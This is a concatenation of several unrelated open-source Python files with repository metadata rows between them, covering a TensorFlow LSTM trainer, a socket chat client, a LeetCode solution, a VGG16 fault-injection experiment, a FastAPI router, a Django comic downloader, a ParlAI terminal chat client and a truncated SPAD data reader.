    if not os.path.exists(directory_name):
        os.mkdir(directory_path)
    saver.save(sess, os.path.join(directory_path, model_name))
def model():
x = tf.compat.v1.placeholder(tf.float32, [None, 27551])
label = tf.compat.v1.placeholder(tf.float32, [None, 2])
fx = tf.reshape(x, [-1, 27551, 1])
drop_rate = tf.compat.v1.placeholder(tf.float32)
# x = tf.split(x, batch_size)
# birnn
# lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(36499, forget_bias=1.0)
# lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(36499, forget_bias=1.0)
# outputs, _, _ = tf.contrib.rnn.static_bidirectional_rnn(lstm_fw_cell, lstm_bw_cell, x, dtype=tf.float32)
# rnn
rnncell = tf.keras.layers.LSTMCell(32)
rnnlayer = tf.keras.layers.RNN(rnncell)
rnnop = rnnlayer(fx)
rnnop_dropout = tf.nn.dropout(rnnop, rate=drop_rate)
# full connect
W_fc = wei_mat([32, 2048])
B_fc = bias_mat([2048])
Out_fc = tf.nn.relu(multi(rnnop_dropout, W_fc) + B_fc)
# Full Connected Dropout
Out_fc_dropout = tf.nn.dropout(Out_fc, rate=drop_rate)
# Softmax->2 labels
W_soft = wei_mat([2048, 2])
B_soft = bias_mat([2])
y = tf.nn.softmax(multi(Out_fc_dropout, W_soft) + B_soft)
return x, label, y, drop_rate
def train_model(epoch=30):
global mod_cnt, batch_size
data = input_data.read_data_sets('train.csv')
batch_num = int(data.size() / batch_size) + 1
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.compat.v1.InteractiveSession(config=config)
# get model
x, label, y, drop_rate = model()
# cross entropy
cross_entropy = -tf.reduce_sum(label * tf.math.log(y))
train_step = tf.compat.v1.train.AdamOptimizer(1e-5).minimize(cross_entropy)
# accuracy
predict = tf.equal(tf.argmax(label, 1), tf.argmax(y, 1))
accuracy = tf.reduce_mean(tf.cast(predict, dtype=tf.float32))
saver = tf.compat.v1.train.Saver()
ckpt = tf.train.get_checkpoint_state('MODEL/')
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
print('Model: ' + str(ckpt.model_checkpoint_path) + ' has been restored at ' + str(time.strftime('%H:%M:%S')))
else:
tf.compat.v1.global_variables_initializer().run()
print('No model to restore.')
# training
start = time.perf_counter()
if os.path.exists(r'MODEL/ite.npy'):
last = np.load(r'MODEL/ite.npy', allow_pickle=True)
else:
last = (0, 0)
i, j = last[0], last[1]
print('Last Training terminated at epoch %d , batch %d' % (i, j))
print('Training now continue')
while i < epoch + 1:
while j < batch_num:
batch = data.next_batch(batch_size)
train_step.run(feed_dict={x: batch[0], label: batch[1], drop_rate: 0.5}, session=sess)
# training_accuracy = accuracy.eval(feed_dict={x: batch[0], label: batch[1], drop_rate: 0}, session=sess)
# print('epoch:%d/%d batch:%d/%d ---training accracy=%g' % (i, epoch, j, batch_num, training_accuracy))
loss = cross_entropy.eval(feed_dict={x: batch[0], label: batch[1], drop_rate: 0}, session=sess)
print('epoch:%d/%d batch:%d/%d ---loss=%g' % (i, epoch, j, batch_num, loss))
if time.perf_counter() - start > 1800:
save_model(sess, dir, mod_name + mod_end)
start = time.perf_counter()
print('Model saved at ' + str(time.strftime('%H:%M:%S')))
np.save(r'MODEL/ite.npy', (i, j))
j += 1
j = 0
i += 1
save_model(sess, dir, mod_name + mod_end)
sess.close()
def model_call(data):
print(data.shape)
sess = tf.compat.v1.InteractiveSession()
# get model
x, label, y, drop_rate = model()
# recover checkpoint
saver = tf.compat.v1.train.Saver()
directory_path = os.getcwd()
directory_path = os.path.join(directory_path, dir, mod_name + mod_end)
saver.restore(sess, directory_path)
# calling model
prediction = y
total_res = None
for i in range(0, 9550, 50):
print(i)
predint = prediction.eval(feed_dict={x: data[i:i + 50], drop_rate: 0}, session=sess)
res = predint.T
if i == 0:
total_res = res
else:
total_res = np.concatenate((total_res, res), axis=-1)
predint = prediction.eval(feed_dict={x: data[9550:], drop_rate: 0}, session=sess)
res = predint.T
total_res = np.concatenate((total_res, res), axis=-1)
np.save('res.npy', total_res)
with open('r.csv', 'w', newline='') as file:
w = csv.writer(file)
for i in total_res[1]:
w.writerow([i])
if __name__ == "__main__":
with tf.device("/cpu:0"):
train_model()
# a = pd.read_csv('test.csv')
# c = [r for r in a]
# data = a[c[1:-2]].values
# model_call(data)
| B1ACK917/QingDaoCoRec | CoRec/mod.py | mod.py | py | 6,068 | python | en | code | 1 | github-code | 36 |
11193542891 | """ клиентская часть """
import sys
import json
import time
import re
import logging
import logs.config_client_log
from lib.variables import ACTION, PRESENCE, TIME, USER, ACCOUNT_NAME, RESPONSE, AUTH, ALERT, MSG, ERR200, ERR400, \
CLIENT_LISTEN, LISTEN, SENDER, MSG, MSG_TEXT, ERROR
from lib.utils import create_socket, server_settings, get_message, send_message
from lib.errors import ReqFieldMissingError, ServerError
from logs.decoration_log import log
CLIENT_LOGGER = logging.getLogger('client')
@log
def message_from_server(message):
"""Функция - обработчик сообщений других пользователей, поступающих с сервера"""
if ACTION in message and message[ACTION] == MSG and \
SENDER in message and MSG_TEXT in message:
print(f'Получено сообщение от пользователя {message[SENDER]}:\n{message[MSG_TEXT]}')
CLIENT_LOGGER.info(f'Получено сообщение от пользователя {message[SENDER]}:\n{message[MSG_TEXT]}')
else:
CLIENT_LOGGER.error(f'Получено некорректное сообщение с сервера: {message}')
@log
def create_message(sock, account_name='Guest'):
"""Функция запрашивает текст сообщения и возвращает его.
Так же завершает работу при вводе подобной комманды
"""
message = input('Введите сообщение для отправки или \'exit\' для завершения работы: ')
if message.lower() == 'exit':
sock.close()
CLIENT_LOGGER.info('Завершение работы по команде пользователя.')
sys.exit(0)
message_dict = {ACTION: MSG,TIME: time.time(),ACCOUNT_NAME: account_name,MSG_TEXT: message}
CLIENT_LOGGER.debug(f'Сформирован словарь сообщения: {message_dict}')
return message_dict
@log
def create_presence(account_name='Guest'):
    """Build a PRESENCE service message announcing this client to the server.

    :param account_name: name to report (defaults to 'Guest')
    :return: message dict ready for serialization
    """
    # {'action': 'presence', 'time': 1573760672.167031, 'user': {'account_name': 'Guest'}}
    out = {ACTION: PRESENCE, TIME: time.time(), USER: {ACCOUNT_NAME: account_name}}
    CLIENT_LOGGER.debug(f'Сформировано {PRESENCE} сообщение для пользователя {account_name}')
    return out
@log
def get_user():
    """Prompt repeatedly until a valid user name is entered, then return it.

    A valid name is 3-25 Latin letters and not the reserved name 'guest'.
    """
    while True:
        account = input("введите имя пользователя >>>")
        # Bug fix: re.match(r"[A-Za-z]") only validated the FIRST character,
        # so names like 'a__' passed. fullmatch checks the whole name and the
        # length bounds in one step; the user-facing messages are unchanged.
        if not re.fullmatch(r"[A-Za-z]{3,25}", account):
            CLIENT_LOGGER.error(f"недопустимое имя пользователя: {account}")
            print("Имя пользователя должно быть от 3 до 25 латинских символов")
        elif account.lower().strip() == 'guest':
            CLIENT_LOGGER.error(f"недопустимое имя пользователя: {account}")
            print("Недоспустимое имя пользователя")
        else:
            break
    return account
@log
def create_action(account_name, action, msg=None):
    """Build a generic service message of type *action* for *account_name*.

    :param account_name: sender's user name
    :param action: action constant to send (e.g. AUTH)
    :param msg: optional payload stored under the MSG key
    :return: message dict ready for serialization
    """
    # {'action': 'presence', 'time': 1573760672.167031, 'user': {'account_name': 'Guest'}}
    out = {ACTION: action, TIME: time.time(), USER: {ACCOUNT_NAME: account_name}, MSG: msg}
    CLIENT_LOGGER.debug(f'Сформировано {ACTION} сообщение для пользователя {account_name}')
    return out
@log
def process_handler(message):
    """Parse a service reply from the server.

    Returns message[MSG] when the response code is 200, raises ServerError on
    a 400 answer, and raises ReqFieldMissingError when RESPONSE is missing.
    """
    CLIENT_LOGGER.debug(f'Разбор приветственного сообщения от сервера: {message}')
    print(f'Разбор приветственного сообщения от сервера: {message}')
    if RESPONSE in message:
        if message[RESPONSE]==200: #message[RESPONSE]==200:
            CLIENT_LOGGER.debug(f"{message[RESPONSE]} содержит {ERR200}")
            return message[MSG] #ERR200
        elif message[RESPONSE]==ERR400: #message[RESPONSE]==400:
            # NOTE(review): the success branch compares against the int 200,
            # but this branch compares against the ERR400 constant — confirm
            # both match what the server actually sends.
            CLIENT_LOGGER.debug(f"{message[RESPONSE]} содержит {ERR400}")
            raise ServerError(f"{ERR400}: {message[ERROR]}")
    raise ReqFieldMissingError(RESPONSE)
@log
def start_client():
srv_settings = server_settings()
server_address = srv_settings[0]
server_port = srv_settings[1]
client_listen = srv_settings[2]
print(f"start client on: {server_address}:{server_port} | listen_mode={client_listen}")
CLIENT_LOGGER.info(f"client started {server_address}:{server_port} | listen_mode={client_listen}")
try:
transport = create_socket()
transport.connect((server_address, server_port))
send_message(transport, create_presence())
answer = process_handler(get_message(transport))
CLIENT_LOGGER.info(f"соединение с сервером {server_address}:{server_port}. Ответ: {answer}")
print(f"соединение с сервером {server_address}:{server_port}. Ответ: {answer}")
# авторизация
account_name = get_user()
CLIENT_LOGGER.info(f"Guest авторизовался как {account_name}")
CLIENT_LOGGER.debug(f"отправка {AUTH} сообщения на сервер {server_address}:{server_port} от user={account_name}")
message_to_server = create_action(account_name, action=AUTH, msg=None)
send_message(transport, message_to_server)
try:
answer = process_handler(get_message(transport))
print(answer)
except (ValueError, json.JSONDecodeError):
print(answer)
CLIENT_LOGGER.error(f"{ERR400}. Не удалось декодировать сообшение от сервера")
print(f"{ERR400}. Не удалось декодировать сообшение от сервера")
except json.JSONDecodeError:
CLIENT_LOGGER.error(f"не удалось декодировать JSON-строку")
print(f"не удалось декодировать JSON-строку")
sys.exit(1)
except ServerError as error:
CLIENT_LOGGER.error(f"ошибка при установке соединения: {error.text}")
print(f"ошибка при установке соединения: {error.text}")
sys.exit(1)
except ReqFieldMissingError as missing_error:
CLIENT_LOGGER.error(f"в ответе сервера нет обязательного поля {missing_error.missing_field}")
sys.exit(1)
except ConnectionRefusedError:
CLIENT_LOGGER.critical(f"Не удалось подключиться к серверу {server_address}:{server_port}")
sys.exit(1)
else:
print(f"клиент - в режиме client_listen={client_listen:}")
while True:
if not client_listen:
try:
send_message(transport, create_message(transport))
except (ConnectionResetError, ConnectionError, ConnectionAbortedError):
CLIENT_LOGGER.error(f"соединение с сервером {server_address}:{server_port} потеряно")
print(f"соединение с сервером {server_address}:{server_port} потеряно")
sys.exit(1)
if client_listen:
try:
message_from_server(get_message(transport))
except (ConnectionResetError, ConnectionError, ConnectionAbortedError):
CLIENT_LOGGER.error(f"соединение с сервером {server_address}:{server_port} потеряно")
print(f"соединение с сервером {server_address}:{server_port} потеряно")
sys.exit(1)
if __name__ == '__main__':
start_client()
| ESarmanov/client_server_app_Python_GeekBrains | Lesson_7_Sarmanov_EF/client.py | client.py | py | 8,345 | python | ru | code | 0 | github-code | 36 |
class Solution:
    """Best Time to Buy and Sell Stock II — unlimited transactions allowed."""

    def maxProfit(self, prices: List[int]) -> int:
        """Sum every positive day-over-day price increase.

        Equivalent to buying at each local valley and selling at the next
        local peak; an empty price list yields 0.
        """
        return sum(
            max(today - yesterday, 0)
            for yesterday, today in zip(prices, prices[1:])
        )
| korynewton/code-challenges | leetcode/BestTimeToBuySell2/solution.py | solution.py | py | 353 | python | en | code | 0 | github-code | 36 |
11306283317 | import sys
import numpy as np
from tensorflow.keras.applications import VGG16
from tensorflow.keras.applications.vgg16 import preprocess_input
from FaultInjector.StuckAtFaultInjector import StuckAtFaultInjector
from RunManager.NetworkManager import NetworkManager
from FaultDetector.FaultDetectorMetrics import FaultDetectorMetrics
from FaultDetector.ScoreBasedFaultDetector import ScoreBasedFaultDetector
from FaultDetector.MavFaultDetector import MavFaultDetector
from FaultDetector.FaultDetectorEvaluator import FaultDetectorEvaluator
if __name__ == "__main__":
    # CLI: argv[1] = testing dataset dir, argv[2] = detection dataset dir,
    # argv[3] = folder for the mean-activation-vector / distance pickles.
    # testing_dir: the folder with the testing dataset used to perform the inference;
    # used to compute how much a fault impacts a run.
    # detection_dir: the folder containing the detection dataset used to compute the
    # metrics needed by the fault detectors.
    testing_dir = sys.argv[1]
    detection_dir = sys.argv[2]
    # mav_file_location: where to load/save the mean activation vector and distance
    # files for the detection dataset.
    mav_file_location = sys.argv[3]
    # threshold_file_location = sys.argv[4]
    # Experiment parameters (number of seeds, inference batch size, top-N accuracy,
    # and the on-disk format of the exported results).
    number_of_experiments = 1000
    batch_size = 128
    top_n = 5
    output_format = 'pickle'
    # Fault-injection campaign sizes tried for every seed, and the cap on the
    # generated fault-list length.
    number_of_faults_list = [25, 50, 75, 100, 125]
    max_fault_list_length = 1000
    # Fixed-seed RNG so the same seed_list is reproducible across runs.
    generator_seed = 1234
    generator = np.random.default_rng(generator_seed)
    # Only the [list_beginning, list_end) slice of the drawn seeds is run here,
    # allowing the full set of experiments to be split across invocations.
    list_beginning = 0
    list_end = 100
    seed_list = generator.choice(int(10e6), size=number_of_experiments, replace=False)
    seed_list = seed_list[list_beginning: list_end]
    # STEP 1 - Golden (fault-free) run
    # 1.1 - Create the network (VGG16, logits output: no classifier activation)
    vgg = VGG16(classifier_activation=None)
    vgg.compile(metrics=['accuracy'])
    # 1.2 - Initialize the network manager
    network_manager = NetworkManager(network=vgg, dataset_dir=testing_dir)
    # 1.3 - Initialize the fault detector metrics (OpenMax: per-class mean
    # activation vectors, distances, and a fitted Weibull tail model)
    metrics = FaultDetectorMetrics(network=vgg, dataset_dir=detection_dir)
    open_max_activation_vectors = metrics.compute_mean_activation_vectors(file_location=f'{mav_file_location}/mav.pkl',
                                                                          pre_processing_function=preprocess_input)
    open_max_distances = metrics.compute_mav_distance(mav=open_max_activation_vectors,
                                                      file_location=f'{mav_file_location}/distance.pkl',
                                                      pre_processing_function=preprocess_input)
    open_max_weibull = metrics.fit_weibull(open_max_distances,
                                           tail_size=20)
    # score_based_threshold = metrics.compute_score_based_threshold(file_location=threshold_file_location,
    #                                                               pre_processing_function=preprocess_input)
    # 1.4 - Execute the golden run and keep its results as the reference
    print(f'Starting golden run... \n')
    network_manager.run_and_export(run_name=f'vgg_imagenet',
                                   output_dir='GoldenRunResults-OpenMax',
                                   top_n=top_n,
                                   output_format=output_format,
                                   pre_processing_function=preprocess_input,
                                   open_max_activation_vectors=open_max_activation_vectors,
                                   open_max_weibull=open_max_weibull)
    network_manager.save_golden_results()
    # STEP 2 - Faulty runs: one injection campaign per (seed, number_of_faults) pair
    for count, seed in enumerate(seed_list):
        print(f'Beginning run #{count} of {len(seed_list)}.\n')
        # 2.1 - reset the network to its original state (i.e. load the original weights)
        network_manager.reset_network()
        # 2.2 - Initialize the fault injector with this experiment's seed
        fault_injector = StuckAtFaultInjector(vgg, seed)
        # 2.3 - Generate a fault list and perform a fault injection campaign for
        # each fault count in the list
        for number_of_faults in number_of_faults_list:
            fault_injector.fault_injection_campaign(number_of_faults=number_of_faults,
                                                    folder_path='FaultList',
                                                    fault_list_length=max_fault_list_length)
            # 2.4 - Execute a faulty run (SDC metrics compare against the golden run)
            print(f'Starting faulty run {seed}_{number_of_faults}... \n')
            inference_results = network_manager.run_and_export(run_name=f'vgg_imagenet_{seed}_{number_of_faults}',
                                                               output_dir='FaultyRunResults-OpenMax',
                                                               top_n=top_n,
                                                               compute_sdc_metrics=True,
                                                               output_format=output_format,
                                                               pre_processing_function=preprocess_input,
                                                               open_max_activation_vectors=open_max_activation_vectors,
                                                               open_max_weibull=open_max_weibull)
            # 2.5 - Initialize the fault detectors
            # score_based_fault_detector = ScoreBasedFaultDetector(inference_result=inference_results,
            #                                                      threshold=score_based_threshold)
            # mav_fault_detector = MavFaultDetector(inference_result=inference_results,
            #                                       threshold=open_max_threshold)
            # 2.6 - Run the fault detectors
            # score_based_fault_detector_results = score_based_fault_detector.detect_faults()
            # mav_fault_detector_results = mav_fault_detector.detect_faults()
            # 2.7 - Evaluate the performance of the fault detectors
            # score_based_evaluation = FaultDetectorEvaluator.evaluate_and_export_fault_detector(
            #     fault_detector_dict=score_based_fault_detector_results,
            #     run_sdc=inference_results,
            #     file_name=f'vgg_imagenet_{seed}_{number_of_faults}_score_based',
            #     output_dir='FaultDetectorResults')
            # mav_evaluation = FaultDetectorEvaluator.evaluate_and_export_fault_detector(
            #     fault_detector_dict=mav_fault_detector_results,
            #     run_sdc=inference_results,
            #     file_name=f'vgg_imagenet_{seed}_{number_of_faults}_mav',
            #     output_dir='FaultDetectorResults')
24739226033 | from fastapi import APIRouter
from app.api.segmentation import doc_parser, paddle
from app.core.config import settings
from app.schemas.doc_parser import ImageInput, ImageOutput
# Router for the document-segmentation endpoints; mounted under /segment.
router = APIRouter(prefix="/segment", tags=["segment"])
@router.post("/detect-image")
async def doc_parser_api(*, img_in: ImageInput):
    """Detect layout regions in the posted image via the doc_parser model."""
    # print("requesting `doc_parser_api`")
    return await doc_parser.detect_image(img_in)
@router.post("/detect-text")
async def paddle_api(*, img_in: ImageInput):
    """Detect text in the posted image via PaddleOCR."""
    # print("requesting `paddle_text_api`")
    return await paddle.detect_text(img_in)
@router.post("/detect-bitmap")
async def paddle_bitmap_api(*, img_in: ImageInput):
    """Run PaddleOCR's DB bitmap detection on the posted image."""
    # print("requesting `paddle_bitmap_api`")
    return await paddle.db_detect_bitmap(img_in)
@router.post("/detect-text-fast")
async def paddle_math_api(*, img_in: ImageInput):
    """Fast text detection on the posted image.

    NOTE(review): the function name says "math" but it delegates to
    detect_text_fast — presumably a leftover name; confirm before renaming
    (the route path, not the function name, is what clients call).
    """
    # print("requesting `detect_text_fast`")
    return await paddle.detect_text_fast(img_in)
| rednam-ntn/dosa | server/app/api/__init__.py | __init__.py | py | 933 | python | en | code | 1 | github-code | 36 |
35918965719 | import contextlib
import hashlib
import httplib
import socket
import tempfile
import urllib2
try:
from PIL import Image as PILImage
except ImportError:
import Image as PILImage # noqa
from django.conf import settings
from django.core.files import File
from django.db import transaction
from comics.aggregator.exceptions import (
DownloaderHTTPError, ImageTypeError, ImageIsCorrupt, ImageAlreadyExists,
ImageIsBlacklisted)
from comics.core.models import Release, Image
# Image types we accept, and the file extension they are saved with
IMAGE_FORMATS = {
'GIF': '.gif',
'JPEG': '.jpg',
'PNG': '.png',
}
class ReleaseDownloader(object):
    """Turns a crawled release into a persisted Release with its images."""
    def download(self, crawler_release):
        """Download all images of the crawled release and persist a Release."""
        images = self._download_images(crawler_release)
        return self._create_new_release(
            crawler_release.comic, crawler_release.pub_date, images)
    def _download_images(self, crawler_release):
        # Download every image referenced by the crawled release.
        image_downloader = ImageDownloader(crawler_release)
        return map(image_downloader.download, crawler_release.images)
    @transaction.commit_on_success
    def _create_new_release(self, comic, pub_date, images):
        # Create the Release row and attach the downloaded images atomically
        # (the decorator commits on success, rolls back on exception).
        release = Release(comic=comic, pub_date=pub_date)
        release.save()
        for image in images:
            release.images.add(image)
        return release
class ImageDownloader(object):
    """Downloads, validates, deduplicates and stores a single comic image."""
    def __init__(self, crawler_release):
        self.crawler_release = crawler_release
    def download(self, crawler_image):
        """Fetch one image; return an existing Image on checksum match,
        otherwise validate and store a new one.

        Raises the Downloader*/Image* exceptions from the helpers below.
        """
        # self.identifier is used purely for error reporting; it gets the
        # checksum prefix appended once the payload is known.
        self.identifier = self.crawler_release.identifier
        with self._download_image(
                crawler_image.url, crawler_image.request_headers
        ) as image_file:
            checksum = self._get_sha256sum(image_file)
            self.identifier = '%s/%s' % (self.identifier, checksum[:6])
            self._check_if_blacklisted(checksum)
            existing_image = self._get_existing_image(
                comic=self.crawler_release.comic,
                has_rerun_releases=self.crawler_release.has_rerun_releases,
                checksum=checksum)
            if existing_image is not None:
                return existing_image
            image = self._validate_image(image_file)
            file_extension = self._get_file_extension(image)
            file_name = self._get_file_name(checksum, file_extension)
            return self._create_new_image(
                comic=self.crawler_release.comic,
                title=crawler_image.title,
                text=crawler_image.text,
                image_file=image_file,
                file_name=file_name,
                checksum=checksum)
    def _download_image(self, url, request_headers):
        # Download the URL into a named temp file and return it rewound;
        # every transport failure is normalized to DownloaderHTTPError.
        try:
            request = urllib2.Request(url, None, request_headers)
            with contextlib.closing(urllib2.urlopen(request)) as http_file:
                temp_file = tempfile.NamedTemporaryFile(suffix='comics')
                temp_file.write(http_file.read())
                temp_file.seek(0)
                return temp_file
        except urllib2.HTTPError as error:
            raise DownloaderHTTPError(self.identifier, error.code)
        except urllib2.URLError as error:
            raise DownloaderHTTPError(self.identifier, error.reason)
        except httplib.BadStatusLine:
            raise DownloaderHTTPError(self.identifier, 'BadStatusLine')
        except socket.error as error:
            raise DownloaderHTTPError(self.identifier, error)
    def _get_sha256sum(self, file_handle):
        # Stream-hash the file, restoring the original file position after.
        # NOTE(review): local name `hash` shadows the builtin, and the chunk
        # size 8096 is presumably meant to be 8192 — harmless either way.
        original_position = file_handle.tell()
        hash = hashlib.sha256()
        while True:
            data = file_handle.read(8096)
            if not data:
                break
            hash.update(data)
        file_handle.seek(original_position)
        return hash.hexdigest()
    def _check_if_blacklisted(self, checksum):
        # Reject images whose checksum is configured as blacklisted.
        if checksum in settings.COMICS_IMAGE_BLACKLIST:
            raise ImageIsBlacklisted(self.identifier)
    def _get_existing_image(self, comic, has_rerun_releases, checksum):
        # Return the already-stored Image with this checksum, or None.
        # A duplicate is only acceptable when the comic reruns releases.
        try:
            image = Image.objects.get(comic=comic, checksum=checksum)
            if image is not None and not has_rerun_releases:
                raise ImageAlreadyExists(self.identifier)
            return image
        except Image.DoesNotExist:
            return None
    def _validate_image(self, image_file):
        # Fully decode the image with PIL; decoding failures surface as
        # ImageIsCorrupt (IndexError comes from truncated image data).
        try:
            image = PILImage.open(image_file)
            image.load()
            return image
        except IndexError:
            raise ImageIsCorrupt(self.identifier)
        except IOError as error:
            raise ImageIsCorrupt(self.identifier, error.message)
    def _get_file_extension(self, image):
        # Only the formats in IMAGE_FORMATS are accepted for storage.
        if image.format not in IMAGE_FORMATS:
            raise ImageTypeError(self.identifier, image.format)
        return IMAGE_FORMATS[image.format]
    def _get_file_name(self, checksum, extension):
        # NOTE(review): implicitly returns None when either part is falsy;
        # callers always pass truthy values here, but an explicit error
        # would be clearer.
        if checksum and extension:
            return '%s%s' % (checksum, extension)
    @transaction.commit_on_success
    def _create_new_image(
            self, comic, title, text, image_file, file_name, checksum):
        # Persist the new Image (file + optional title/text) in one
        # transaction.
        image = Image(comic=comic, checksum=checksum)
        image.file.save(file_name, File(image_file))
        if title is not None:
            image.title = title
        if text is not None:
            image.text = text
        image.save()
        return image
| macanhhuy/comics | comics/aggregator/downloader.py | downloader.py | py | 5,379 | python | en | code | null | github-code | 36 |
74050008424 | import json
import uuid
import websocket
import time
import threading
from parlai.core.params import ParlaiParser
# the socket callback functions operate asynchronously.
# upon exit of a chat, we do not want the user to view any additional messages from the server.
# alas, it is necessary to send two messages ([DONE], and EXIT) in order to fully exist the world pool
# to prevent receiving a message after sending [DONE], we track the user's state with
# this global variable.
RUNNING = True
def _get_rand_id():
"""
:return: The string of a random id using uuid4
"""
return str(uuid.uuid4())
def _prBlueBG(text):
"""
Print given in text with a blue background.
:param text: The text to be printed
"""
print("\033[44m{}\033[0m".format(text), sep="")
def on_message(ws, message):
    """
    Prints the incoming message from the server.
    :param ws: a WebSocketApp
    :param message: json with 'text' field to be printed
    """
    # After the user sent [DONE], suppress any further server output
    # (RUNNING is cleared by the input loop in _run).
    if not RUNNING:
        return
    incoming_message = json.loads(message)
    # Reset the colour set by the input prompt before printing bot output.
    print("\033[0m\n")
    print("Bot: " + incoming_message['text'])
    # Quick replies are optional; show them as a pipe-separated option list.
    quick_replies = incoming_message.get('quick_replies')
    if quick_replies is not None and len(quick_replies) > 0:
        print(f"\nOptions: [{'|'.join(quick_replies)}]")
    # Re-arm the blue background for the next user prompt.
    print("\033[44m\n")
def on_error(ws, error):
    """
    Prints an error, if occurs.
    :param ws: WebSocketApp
    :param error: An error
    """
    print(error)
def on_close(ws):
    """Report the closed connection after resetting terminal colours.

    :param ws: WebSocketApp
    """
    # One print emits the colour-reset escape, a newline, and the notice.
    print("\033[0m" + "\n" + "Connection closed")
def _run(ws, id):
    """
    Takes user input and sends it to a websocket.
    :param ws: websocket.WebSocketApp
    """
    global RUNNING
    while True:
        # Blue-background prompt; reset colour right after the user types.
        x = input("\033[44m Me: ")
        print("\033[0m", end="")
        data = {}
        data['id'] = id
        data['text'] = x
        # [DONE] ends the chat: clear RUNNING first so on_message drops any
        # late server replies (see module-top note about the async callbacks).
        if x == "[DONE]":
            RUNNING = False
        json_data = json.dumps(data)
        ws.send(json_data)
        time.sleep(1)
        if x == "[DONE]":
            # Two messages are required to fully leave the world pool:
            # [DONE] above, then EXIT here.
            time.sleep(1)
            data['text'] = 'EXIT'
            ws.send(json.dumps(data))
            break
    ws.close()
def on_open(ws):
    """
    Starts a new thread that loops, taking user input and sending it to the websocket.
    :param ws: websocket.WebSocketApp that sends messages to a terminal_manager
    """
    # Each session gets a random id so the server can track this client.
    id = _get_rand_id()
    threading.Thread(target=_run, args=(ws, id)).start()
def setup_args():
    """
    Set up args, specifically the host and port of the chat server.
    :return: the parsed command-line options (not the parser itself).
    """
    parser = ParlaiParser(False, False)
    parser_grp = parser.add_argument_group('Terminal Chat')
    parser_grp.add_argument(
        '--port', default=35496, type=int, help='Port to run the terminal chat server'
    )
    parser_grp.add_argument(
        '--host', default='localhost', type=str, help='Host to connect to.'
    )
    return parser.parse_args()
# Entry point: connect to the chat server and hand control to the
# websocket callbacks defined above.
if __name__ == "__main__":
    opt = setup_args()
    # NOTE(review): fallback 34596 differs from the parser default 35496 —
    # the fallback is never used since the parser always supplies a value,
    # but the mismatch looks like a typo; confirm the intended port.
    port = opt.get('port', 34596)
    host = opt.get('host', 'localhost')
    print("Connecting to port: ", port)
    ws = websocket.WebSocketApp(
        f"ws://{host}:{port}/websocket",
        on_message=on_message,
        on_error=on_error,
        on_close=on_close,
    )
    ws.on_open = on_open
    ws.run_forever()
30330065701 | import numpy as np
import os
import argparse
import h5py
import sys
from spad_tools.listFiles import listFiles
from spad_tools.array2tiff import array2tiff, array2RGBtiff
from spad_tools.getFCSinfo import getFileInfo
from libttp import ttp
"""
This set of functions allows reading a binary file containing SPAD measurements
using only the file name. The parameters are extracted from the matrix using
the tags. The assumption is that the parameters are constant and that all the
frames are complete.
Author: Sebastian Acuna
"""
def file_to_count(fname, datatype=np.uint16, printInfo=False):
    """
    Read a bin file and decode the photon counts for each measurement.

    The scan geometry (time bins per pixel, frames, lines) is recovered from
    the tag bits embedded in the second 64-bit word of each measurement.

    Args:
        fname: name of the file containing the data
        datatype: dtype of the output count matrix (default np.uint16)
        printInfo: if True, print the decoded geometry while parsing

    Returns:
        (out, frames, y, x, time_per_pixel) where out is an N x 25 count
        matrix, or None if the file could not be read.
    """
    # NOTE(review): bare except silently maps any read error to None;
    # callers must check the return value before unpacking.
    try:
        raw = np.fromfile(fname, dtype=">u8")
    except:
        if printInfo:
            print("Error reading binary file")
        return None
    elements = raw.shape[0]
    # Two big-endian 64-bit words per measurement position.
    positions = int(elements/2)
    raw_pos = np.reshape(raw, (positions, 2))
    if printInfo:
        print(f"Elements: {elements}")
        print(f"Positions: {positions}")
        print(f"data table: {raw_pos.shape}")
    # Bit 0 of word 1 toggles once per pixel: the first toggle index gives
    # the number of time bins per pixel.
    time_per_pixel_tag = np.bitwise_and(raw_pos[:,1], 0b1)
    idx = np.argmax(time_per_pixel_tag != time_per_pixel_tag[0]) # positions per time
    time_per_pixel = int(idx)
    if printInfo:
        print(f"time per pixel: {time_per_pixel}")
    # Bit 2 of word 1 toggles once per frame.
    frame_tag = np.bitwise_and(np.right_shift(raw_pos[:,1], 2), 0b1)
    idx = np.argmax(frame_tag != frame_tag[0]) # positions per frame
    if idx == 0:
        if printInfo:
            print("Unique frame")
        frames = 1
    else:
        frames = int(positions/idx) # TODO: check condition with larger dataset
    # Bit 1 of word 1 toggles once per line; dividing by time_per_pixel
    # yields the number of pixels per line (x).
    line_tag = np.bitwise_and(np.right_shift(raw_pos[:,1], 1), 0b1)
    idx = int(np.argmax(line_tag != line_tag[0])/time_per_pixel) # positions per line
    if printInfo:
        print(f"Positions per lines: {idx}")
    x = int(idx)
    y = int(positions/x/time_per_pixel/frames)
    if printInfo:
        print(f"Dimensions: Y:{y}, X:{x}")
    out = np.zeros((positions , 25), dtype = datatype)
    matrix_to_count(raw_pos, out)
    return out, frames, y, x, time_per_pixel
def file_to_FCScount(fname, datatype=np.uint16, Npoints=-1, Noffset=0):
    """
    Read (part of) a bin file and decode the counts for each measurement.

    Args:
        fname: name of the file containing the data
        datatype: dtype of the output count matrix (default np.uint16)
        Npoints: number of measurement positions to read
            (-1 presumably reads the whole file via np.fromfile's count;
            note -1 * 2 = -2 is what actually reaches np.fromfile — confirm)
        Noffset: number of positions (16 bytes each) to skip from the start

    Returns:
        An N x 25 count matrix, or None if the file could not be read.
    """
    try:
        # Each position is two 8-byte words: scale the position counts to
        # word counts / byte offsets.
        Npoints = Npoints * 2
        NbytesOffset = 16 * Noffset
        raw = np.fromfile(fname, dtype=">u8", count=Npoints, offset=NbytesOffset)
    except:
        print("Error reading binary file")
        return None
    elements = raw.shape[0]
    print(f"Elements: {elements}")
    positions = int(elements/2)
    print(f"Positions: {positions}")
    # Pre-allocate the (large) output before reshaping the raw data.
    print("Freeing memory")
    out = np.zeros((positions , 25), dtype = datatype)
    print("Done.")
    raw_pos = np.reshape(raw, (positions, 2))
    print(f"data table: {raw_pos.shape}")
    print("Converting data to counts")
    matrix_to_count(raw_pos, out)
    print("Done.")
    return out
def matrix_to_count(values, out):
    """Decode raw 64-bit measurement words into per-channel photon counts.

    Each measurement is two 64-bit words; every one of the 25 channels is a
    fixed bit field inside one of those words.  The layout table below lists
    (output column, word index, right shift, field width in bits) and is
